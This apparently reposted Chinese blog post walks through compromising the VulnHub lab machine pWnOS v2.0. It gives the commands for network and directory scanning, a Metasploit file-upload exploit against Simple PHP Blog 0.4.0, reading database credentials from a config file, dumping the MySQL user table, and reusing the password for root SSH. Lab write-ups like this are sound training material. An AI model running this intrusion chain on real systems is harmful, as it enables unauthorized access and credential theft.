vulnhub pWnOS v2.0通关

news/2024/6/15 16:21:40/文章来源:https://blog.csdn.net/2301_80661529/article/details/137170004

 知识点总结:

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码,查看模块信息

环境准备

攻击机:kali2023

靶机:pWnOS v2.0

安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到,该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

 其次靶机的虚拟机设置如下:

开始渗透!

信息收集

收集IP(虽然已经知道了)

arp-scan -l

 端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录,访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在,那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url,此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件:mysqli_connect.php,看看

拿到数据库root密码,登录

看看能不能拿到相关账户密码,分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

 成功root!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_1034246.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2024年第十届国际虚拟现实大会(ICVR 2024)即将召开!

会议面向虚拟现实、增强现实、人工智能等互联网新技术领域的专家及学者, 致力于共同促进国内外虚拟现实的发展与应用。 2014年至今,ICVR在全球新加坡,美国洛杉矶,中国成都,香港等国家及地区召开,面向虚拟现…

干部任免审批表管理系统(三) 读取Lrmx格式文件数据并存储到实体类中

前言: Lrmx文件本质就是读取xml文件,数据库字段设计和类的属性设计都xml中节点保持了一致。那么就可以用类的反射来实现给字段赋值,这样可以大大节省代码的编写量。 一、加载文件并遍历所有的节点: File f new File(this.…

MOV压敏电阻的微观结构与制造工艺

EAK 压敏电阻 应用于电力系统的MOV目前主要有两大系列,它们都是以ZnO为主要成分再加人少量其他金属氧化物添加剂而构成的。添加剂为Bi,O:、Sb,O:、MnO₂和CoO,等构成的 MOV称为Bi系列:添加剂为Pr,0、Co,0、Mg0而不含B,0,或含量极少的MOV称为Pr系列(或称稀土系列)。添…

go和Java该如何选择?

今天,每个企业都需要一个软件应用程序,从初创公司到大型公司如果你想以最有效的方式运行业务,你必须把它列在网上。竞争并没有就此结束 但重要的是您能够以多简单、多快速的方式创建软件应用程序-这是引领竞争的正确方式。 选择最适合您的软…

FastAPI Web框架教程 第14章 部署

14-1 在Linux上安装Python 【环境】 腾讯云服务器 Centos 8 【安装方式】 源码编译安装 安装步骤: 第1步:更新yum源 cd /etc/yum.repos.d/ sed -i s/mirrorlist/#mirrorlist/g /etc/yum.repos.d/CentOS-* sed -i s|#baseurlhttp://mirror.centos.…

数据结构(初阶)第二节:顺序表

从本文正式进入对数据结构的讲解,开始前友友们要有C语言的基础,熟练掌握动态内存管理、结构体、指针等章节,方便后续的学习。 顺序表(Sequence List) 线性表的概念:线性表(linear list&#xff…

Docker 部署 FRP 内网穿透 实现端口映射

Frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 官网地址:https://github.com/fatedier/frp 准备工作…

MySql实战--MySQL为什么有时候会选错索引

前面我们介绍过索引,你已经知道了在MySQL中一张表其实是可以支持多个索引的。但是,你写SQL语句的时候,并没有主动指定使用哪个索引。也就是说,使用哪个索引是由MySQL来确定的。 不知道你有没有碰到过这种情况,一条本来…

C 练习实例97 - 读磁盘 写磁盘

题目&#xff1a;从键盘输入一些字符&#xff0c;逐个把它们送到磁盘上去&#xff0c;直到输入一个‘#’为止 在桌面新建一个hello.txt文件&#xff0c;内容示例&#xff1a; 代码&#xff1a; #include <stdio.h> #include <stdlib.h>int main() {FILE *fp; //文…

2024年MathorCup数学建模思路B题思路分享

文章目录 1 赛题思路2 比赛日期和时间3 组织机构4 建模常见问题类型4.1 分类问题4.2 优化问题4.3 预测问题4.4 评价问题 5 建模资料 1 赛题思路 (赛题出来以后第一时间在CSDN分享) https://blog.csdn.net/dc_sinor?typeblog 2 比赛日期和时间 报名截止时间&#xff1a;2024…

视频号不入镜自动开播的机器人真的来啦

您好&#xff0c;我是码农飞哥&#xff08;wei158556&#xff09;&#xff0c;感谢您阅读本文&#xff0c;欢迎一键三连哦。&#x1f4aa;&#x1f3fb; 1. Python基础专栏&#xff0c;基础知识一网打尽&#xff0c;9.9元买不了吃亏&#xff0c;买不了上当。 Python从入门到精通…

Can‘t connect to server on ‘localhost‘ (10061)

问题&#xff1a;电脑关机重启后&#xff0c;连接不上mysql了&#xff0c;报错信息如下&#xff1a;2002 - Cant connect to server on localhost (10061)解决办法&#xff1a;很大的原因是mysql服务没有启动&#xff0c;需要你重启一下mysql&#xff1a; 以管理员的身份运行cm…

vivado 高级编程功能1

适用于 7 系列、 UltraScale 和 UltraScale FPGA 和 MPSoC 的回读和验证 为 7 系列器件生成已加密文件和已经过身份验证的文件 注释 &#xff1a; 如需获取其它信息 &#xff0c; 请参阅《使用加密确保 7 系列 FPGA 比特流的安全》 ( XAPP1239 ) 。 要生成加密比特流…

excel匹配替换脱敏身份证等数据

假如excel sheet1中有脱敏的身份证号码和姓名&#xff0c;如&#xff1a; sheet2中有未脱敏的数据数据 做法如下&#xff1a; 1、在sheet2的C列用公式 LEFT(A2,6)&REPT("*",8)&RIGHT(A2,4) 做出脱敏数据&#xff0c;用来与sheet1的脱敏数据匹配 2、在sheet…

曲面及其方程常见二次曲面记忆特点

1.椭圆柱面 方程特点:与椭圆方程一样,由于方程没有z,所以z可以取任何值. 2.椭圆面 方程特点:遮掉任何一坐标轴的项都是一个椭圆,所以在任何一个坐标平面的投影都是椭圆 3.圆锥面 方程特点:由一条直线旋转得到,两坐标的平方和是另一坐标平方的倍数 4.椭圆锥面 方程特点:集结椭圆…

如何确认前端的部署错误

进行前端部署的时候 通过pm2 list 发现进程报错&#xff0c;如何处理&#xff1f; 通过pm2 logs id 显示出具体的错误进行处理。

msvcp140.dll丢失相关问题的解决方法分享,如何快速修复msvcp140.dll

启动游戏或特定应用程序时出现"msvcp140.dll丢失"的问题。这种情况相对常见&#xff0c;不一定意味着系统存在严重bug。msvcp140.dll是一个动态链接库文件&#xff0c;通常与Visual C Redistributable相关&#xff0c;当它丢失时可能导致依赖该文件的程序无法正常运行…

2024最新华为OD机试试题库全 -【两个字符串间的最短路径问题】- C卷

1. 🌈题目详情 1.1 ⚠️题目 给定两个字符串,分别为字符串 A 与字符串 B。 例如 A字符串为 “ABCABBA”,B字符串为 “CBABAC” 可以得到下图 m * n 的二维数组,定义原点为(0,0),终点为(m,n),水平与垂直的每一条边距离为1,映射成坐标系如下图。 从原点 (0,0) 到 (0,…

crc校验

CRC(Cyclic Redundancy Check)&#xff0c;即循环冗余校验 理论知识 一个视频看懂CRC校验_哔哩哔哩_bilibili crc校验详解_12694841的技术博客_51CTO博客 crc的原理 基本原理&#xff1a;在K位信息码后再拼接R位的校验码&#xff0c;整个编码长度为N位&#xff0c;因此&a…

MySQL---事务

目录 一、事务简介 二、事务操作 1.未控制事务 2.事务控制一 3.控制事务二 三、事务的四大特性 四、并发事务问题 五、事务隔离级别 一、事务简介 事务 是一组操作的集合&#xff0c;它是一个不可分割的工作单位&#xff0c;事务会把所有的操作作为一个整体一起向系统提交或…